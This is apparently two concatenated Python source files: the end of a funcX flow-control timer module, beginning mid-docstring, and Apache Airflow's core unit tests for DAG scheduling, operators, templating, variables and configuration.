method on the sites available as well asqeuque
TODO: When the debug logs are enabled this module emits duplicate messages.
This issue needs more debugging. What I've learnt so far is that the duplicate
messages are present only when the timer thread is started, so this could be
from a duplicate logger being added by the thread.
"""
def __init__(self, *args, threshold=20, interval=5):
"""Initialize the flowcontrol object.
We start the timer thread here
Parameters
----------
- threshold (int) : Tasks after which the callback is triggered
- interval (int) : seconds after which timer expires
"""
self.interchange = None
self.threshold = threshold
self.interval = interval
self.cb_args = args
self.callback = self.strategize
self._handle = None
self._event_count = 0
self._event_buffer = []
self._wake_up_time = time.time() + 1
self._kill_event = threading.Event()
self._thread = threading.Thread(
target=self._wake_up_timer, args=(self._kill_event,), name="Base-Strategy"
)
self._thread.daemon = True
def start(self, interchange):
"""Actually start the strategy
Parameters
----------
interchange: funcx.executors.high_throughput.interchange.Interchange
Interchange to bind the strategy to
"""
self.interchange = interchange
if hasattr(interchange, "provider"):
log.debug(
"Strategy bounds-> init:{}, min:{}, max:{}".format(
interchange.provider.init_blocks,
interchange.provider.min_blocks,
interchange.provider.max_blocks,
)
)
self._thread.start()
def strategize(self, *args, **kwargs):
"""Strategize is called everytime the threshold or the interval is hit"""
log.debug(f"Strategize called with {args} {kwargs}")
def _wake_up_timer(self, kill_event):
"""
Internal. This is the function that the thread will execute.
waits on an event so that the thread can make a quick exit when close() is
called
Args:
- kill_event (threading.Event) : Event to wait on
"""
while True:
prev = self._wake_up_time
# Waiting for the event returns True only when the event
# is set, usually by the parent thread
time_to_die = kill_event.wait(float(max(prev - time.time(), 0)))
if time_to_die:
return
if prev == self._wake_up_time:
self.make_callback(kind="timer")
else:
print("Sleeping a bit more")
def notify(self, event_id):
"""Let the FlowControl system know that there is an event.
This method is to be called from the Interchange to notify the flowcontrol
"""
self._event_buffer.extend([event_id])
self._event_count += 1
if self._event_count >= self.threshold:
log.debug("Eventcount >= threshold")
self.make_callback(kind="event")
def make_callback(self, kind=None):
"""Makes the callback and resets the timer.
KWargs:
- kind (str): Default=None, used to pass information on what
triggered the callback
"""
self._wake_up_time = time.time() + self.interval
self.callback(tasks=self._event_buffer, kind=kind)
self._event_buffer = []
def close(self):
"""Merge the threads and terminate."""
self._kill_event.set()
self._thread.join()
class Timer:
"""This timer is a simplified version of the FlowControl timer.
This timer does not employ notify events.
This is based on the following logic :
.. code-block:: none
BEGIN (INTERVAL, THRESHOLD, callback) :
start = current_time()
while (current_time()-start < INTERVAL) :
wait()
break
callback()
"""
def __init__(self, callback, *args, interval=5):
"""Initialize the flowcontrol object
We start the timer thread here
Args:
- dfk (DataFlowKernel) : DFK object to track parsl progress
KWargs:
- threshold (int) : Tasks after which the callback is triggered
- interval (int) : seconds after which timer expires
"""
self.interval = interval
self.cb_args = args
self.callback = callback
self._wake_up_time = time.time() + 1
self._kill_event = threading.Event()
self._thread = threading.Thread(
target=self._wake_up_timer, args=(self._kill_event,), name="Timer"
)
self._thread.daemon = True
self._thread.start()
def _wake_up_timer(self, kill_event):
"""Internal. This is the function that the thread will execute.
waits on an event so that the thread can make a quick exit when close() is
called
Args:
- kill_event (threading.Event) : Event to wait on
"""
# Sleep till time to wake up
while True:
prev = self._wake_up_time
# Waiting for the event returns True only when the event
# is set, usually by the parent thread
time_to_die = kill_event.wait(float(max(prev - time.time(), 0)))
if time_to_die:
return
if prev == self._wake_up_time:
self.make_callback(kind="timer")
else:
print("Sleeping a bit more")
def make_callback(self, kind=None):
"""Makes the callback and resets the timer."""
self._wake_up_time = time.time() + self.interval
self.callback(*self.cb_args)
def close(self):
"""Merge the threads and terminate."""
self._kill_event.set()
self._thread.join()
|
core.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import doctest
import json
import multiprocessing
import os
import pickle # type: ignore
import re
import signal
import subprocess
import tempfile
import unittest
import warnings
from datetime import timedelta
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from tempfile import NamedTemporaryFile
from time import sleep
from unittest import mock
import six
import sqlalchemy
from dateutil.relativedelta import relativedelta
from numpy.testing import assert_array_almost_equal
from pendulum import utcnow
from airflow import configuration, models
from airflow import jobs, DAG, utils, macros, settings, exceptions
from airflow.bin import cli
from airflow.configuration import AirflowConfigException, run_command
from airflow.exceptions import AirflowException
from airflow.executors import SequentialExecutor
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.models import BaseOperator, Connection, TaskFail
from airflow.models import (
DagBag,
DagRun,
Pool,
DagModel,
TaskInstance,
Variable,
)
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python_operator import PythonOperator
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.dates import (
days_ago, infer_time_unit, round_time,
scale_time_units
)
from airflow.utils.state import State
from airflow.utils.timezone import datetime
from tests.test_utils.config import conf_vars
NUM_EXAMPLE_DAGS = 19
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
EXAMPLE_DAG_DEFAULT_DATE = days_ago(2)
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super().__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(self, context):
pass
class CoreTest(unittest.TestCase):
TEST_SCHEDULE_WITH_NO_PREVIOUS_RUNS_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_no_previous_runs'
TEST_SCHEDULE_DAG_FAKE_SCHEDULED_PREVIOUS_DAG_ID = \
TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous'
TEST_SCHEDULE_DAG_NO_END_DATE_UP_TO_TODAY_ONLY_DAG_ID = \
TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only'
TEST_SCHEDULE_ONCE_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_once'
TEST_SCHEDULE_RELATIVEDELTA_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_relativedelta'
TEST_SCHEDULE_START_END_DATES_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_start_end_dates'
default_scheduler_args = {"num_runs": 1}
def setUp(self):
self.dagbag = DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def tearDown(self):
if os.environ.get('KUBERNETES_VERSION') is not None:
return
dag_ids_to_clean = [
TEST_DAG_ID,
self.TEST_SCHEDULE_WITH_NO_PREVIOUS_RUNS_DAG_ID,
self.TEST_SCHEDULE_DAG_FAKE_SCHEDULED_PREVIOUS_DAG_ID,
self.TEST_SCHEDULE_DAG_NO_END_DATE_UP_TO_TODAY_ONLY_DAG_ID,
self.TEST_SCHEDULE_ONCE_DAG_ID,
self.TEST_SCHEDULE_RELATIVEDELTA_DAG_ID,
self.TEST_SCHEDULE_START_END_DATES_DAG_ID,
]
session = Session()
session.query(DagRun).filter(
DagRun.dag_id.in_(dag_ids_to_clean)).delete(
synchronize_session=False)
session.query(TaskInstance).filter(
TaskInstance.dag_id.in_(dag_ids_to_clean)).delete(
synchronize_session=False)
session.query(TaskFail).filter(
TaskFail.dag_id.in_(dag_ids_to_clean)).delete(
synchronize_session=False)
session.commit()
session.close()
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(self.TEST_SCHEDULE_WITH_NO_PREVIOUS_RUNS_DAG_ID)
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_relativedelta(self):
"""
Tests scheduling a dag with a relativedelta schedule_interval
"""
delta = relativedelta(hours=+1)
dag = DAG(self.TEST_SCHEDULE_RELATIVEDELTA_DAG_ID,
schedule_interval=delta)
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run2)
self.assertEqual(dag.dag_id, dag_run2.dag_id)
self.assertIsNotNone(dag_run2.run_id)
self.assertNotEqual('', dag_run2.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0) + delta,
dag_run2.execution_date,
msg='dag_run2.execution_date did not match expectation: {0}'
.format(dag_run2.execution_date)
)
self.assertEqual(State.RUNNING, dag_run2.state)
self.assertFalse(dag_run2.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(self.TEST_SCHEDULE_DAG_FAKE_SCHEDULED_PREVIOUS_DAG_ID,
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(self.TEST_SCHEDULE_ONCE_DAG_ID)
dag.schedule_interval = '@once'
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(self.TEST_SCHEDULE_START_END_DATES_DAG_ID,
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(BaseOperator(task_id='faketastic', owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for _ in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
now = utcnow()
start_date = now.subtract(weeks=1)
runs = (now - start_date).days
dag = DAG(self.TEST_SCHEDULE_DAG_NO_END_DATE_UP_TO_TODAY_ONLY_DAG_ID,
start_date=start_date,
schedule_interval=delta)
dag.add_task(BaseOperator(task_id='faketastic', owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for _ in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(configuration.conf.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with warnings.catch_warnings(record=True) as w:
BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertTrue(
issubclass(w[0].category, PendingDeprecationWarning))
self.assertIn(
('Invalid arguments were passed to BashOperator '
'(task_id: test_illegal_args).'),
w[0].message.args[0])
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command="echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_on_failure_callback(self):
# Annoying workaround for nonlocal not existing in python 2
data = {'called': False}
def check_failure(context, test_case=self):
data['called'] = True
error = context.get('exception')
test_case.assertIsInstance(error, AirflowException)
t = BashOperator(
task_id='check_on_failure_callback',
bash_command="exit 1",
dag=self.dag,
on_failure_callback=check_failure)
self.assertRaises(
exceptions.AirflowException,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
self.assertTrue(data['called'])
def test_trigger_dagrun(self):
def trigga(context, obj):
if True:
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
provide_context=True,
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
'{\n "foo": "bar"\n}')
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject:
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_task_get_template(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
context = ti.get_template_context()
# DEFAULT DATE is 2015-01-01
self.assertEqual(context['ds'], '2015-01-01')
self.assertEqual(context['ds_nodash'], '20150101')
# next_ds is 2015-01-02 as the dag interval is daily
self.assertEqual(context['next_ds'], '2015-01-02')
self.assertEqual(context['next_ds_nodash'], '20150102')
# prev_ds is 2014-12-31 as the dag interval is daily
self.assertEqual(context['prev_ds'], '2014-12-31')
self.assertEqual(context['prev_ds_nodash'], '20141231')
self.assertEqual(context['ts'], '2015-01-01T00:00:00+00:00')
self.assertEqual(context['ts_nodash'], '20150101T000000')
self.assertEqual(context['ts_nodash_with_tz'], '20150101T000000+0000')
self.assertEqual(context['yesterday_ds'], '2014-12-31')
self.assertEqual(context['yesterday_ds_nodash'], '20141231')
self.assertEqual(context['tomorrow_ds'], '2015-01-02')
self.assertEqual(context['tomorrow_ds_nodash'], '20150102')
def test_import_examples(self):
self.assertEqual(len(self.dagbag.dags), NUM_EXAMPLE_DAGS)
def test_local_task_job(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_doctests(self):
modules = [utils, macros]
for mod in modules:
failed, _ = doctest.testmod(mod)
if failed:
raise Exception("Failed a doctest")
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_raise_key_error(self):
with self.assertRaises(KeyError):
Variable.get("thisIdDoesNotExist")
def test_get_non_existing_var_with_none_default_should_return_none(self):
self.assertIsNone(Variable.get("thisIdDoesNotExist", default_var=None))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
# Check the returned value, and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_delete(self):
key = "tested_var_delete"
value = "to be deleted"
# No-op if the variable doesn't exist
Variable.delete(key)
with self.assertRaises(KeyError):
Variable.get(key)
# Set the variable
Variable.set(key, value)
self.assertEqual(value, Variable.get(key))
# Delete the variable
Variable.delete(key)
with self.assertRaises(KeyError):
Variable.get(key)
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
with conf_vars({('core', 'FERNET_KEY_CMD'): 'printf HELLO'}):
FALLBACK_FERNET_KEY = configuration.conf.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
with conf_vars({('core', 'FERNET_KEY'): None}):
with self.assertRaises(AirflowConfigException) as cm:
configuration.conf.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
